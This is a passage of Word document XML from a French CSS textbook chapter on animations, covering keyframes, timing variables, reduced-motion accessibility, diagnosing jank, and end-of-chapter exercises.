        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois durées et trois courbes, réutilisables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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --duree-rapide: 150ms;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --duree-normale: 250ms;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --duree-lente: 400ms;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --courbe-standard: cubic-bezier(.2, .8, .2, 1);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --courbe-entree: cubic-bezier(.05, .7, .1, 1);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --courbe-sortie: cubic-bezier(.3, 0, .8, .15);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une animation d'entrée peut être plus longue que celle de sortie : l'utilisateur attend l'apparition, mais souhaite retrouver son contexte rapidement. C'est un principe constant des interfaces soignées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.4 Animations déclaratives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@keyframes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> définit une séquence d'états. L'animation s'applique avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>animation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, qui accepte le nom, la durée, la courbe, le délai, le nombre de répétitions et le mode de remplissage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux animations : apparition et chargement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@keyframes apparition {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  from { opacity: 0; transform: translateY(8px); }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  to   { opacity: 1; transform: translateY(0); }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.message {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  animation: apparition 280ms var(--courbe-standard) both;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@keyframes pulsation {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  0%, 100% { opacity: 1; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  50%      { opacity: .45; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.chargement { animation: pulsation 1.4s ease-in-out infinite; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.54 — Six propriétés d'animation</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44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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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278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Valeur typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>animation-name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>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Nom du </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@keyframes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apparition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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animation-duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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280ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>animation-timing-function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Courbe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cubic-bezier(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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animation-delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Délai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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0 à 120ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>animation-iteration-count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Répétitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>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1 ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>infinite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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animation-fill-mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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État hors animation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.5 Mouvement et accessibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Certaines personnes souffrent de troubles vestibulaires : un mouvement ample, un parallaxe ou un zoom brutal peut provoquer nausée et vertige. La préférence système </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefers-reduced-motion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit être respectée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Neutraliser le mouvement sans casser les interfaces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@media (prefers-reduced-motion: reduce) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *, *::before, *::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    animation-duration: 0.01ms !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    animation-iteration-count: 1 !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    transition-duration: 0.01ms !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    scroll-behavior: auto !important;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réduire le mouvement ne signifie pas supprimer toute information : le changement d'état doit rester perceptible autrement — un changement de couleur, une icône, un texte.</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TROIS ANIMATIONS À ÉVITER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Le clignotement de plus de trois fois par seconde (risque de crise).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Le défilement automatique d'un carrousel sans bouton de pause.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Le zoom à l'entrée qui décale le contenu environnant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>16.6 Diagnostiquer une animation saccadée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une animation saccadée vient de trois causes : une propriété coûteuse, un travail excessif exécuté à chaque image, ou une couche compositeur saturée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une méthode de mesure, pas une intuition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Diagnostiquer dans les outils du navigateur */</w:t>
        <w:br/>
        <w:t>/* 1. Ouvrir l'onglet Performance */</w:t>
        <w:br/>
        <w:t>/* 2. Enregistrer 3 secondes pendant l'animation */</w:t>
        <w:br/>
        <w:t>/* 3. Repérer les images &gt; 16 ms (vertes = peinture, rouges = script) */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.55 — Quatre symptômes d'animation et leur cause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8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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Saccades régulières</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Propriété de mise en page animée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>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Passer à </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>transform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Début d'animation lent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Calcul initial trop lourd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Préparer avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>will-change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Décalage du contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Propriété qui modifie le flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utiliser une transformation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Batterie qui chauffe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Animation infinie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Limiter la durée, arrêter hors écran</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LA RÈGLE DES TROIS QUESTIONS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Cette animation apporte-t-elle une information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Que se passe-t-il si elle est désactivée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Dure-t-elle moins de 300 ms, sauf exception justifiée ?</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Transition, transformation et animation répondent à trois besoins distincts.</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transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'animent sans recalcul de mise en page.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150 à 300 ms suffisent pour la plupart des transitions d'interface.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durées et les courbes se définissent comme des variables.</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prefers-reduced-motion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit toujours être respecté.</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information ne doit jamais dépendre du mouvement seul.</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saccade se mesure dans l'onglet Performance, pas au ressenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La présentation est complète : typographie, couleurs, boîtes, composants, mouvement. La partie suivante passe à l'architecture et aux mises en page modernes.</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16.1 — Animer un panneau latéral</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Créez un panneau qui glisse depuis la droite sans recalculer la page.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform</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Ajoutez une transition réversible.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Respectez les préférences de mouvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 16.2 — Concevoir une animation de chargement</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 bouton déclenche un envoi de formulaire qui dure une seconde.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Affichez un état de chargement dans le bouton.</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Empêchez le double envoi.</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Annoncez l'état aux technologies d'assistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 16.3 — Corriger une animation coûteuse</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Cette animation fait saccader la page.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.menu { transition: height .4s; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.carte:hover { margin-top: -8px; transition: margin .3s; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.fond { animation: deplacement 8s infinite; }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
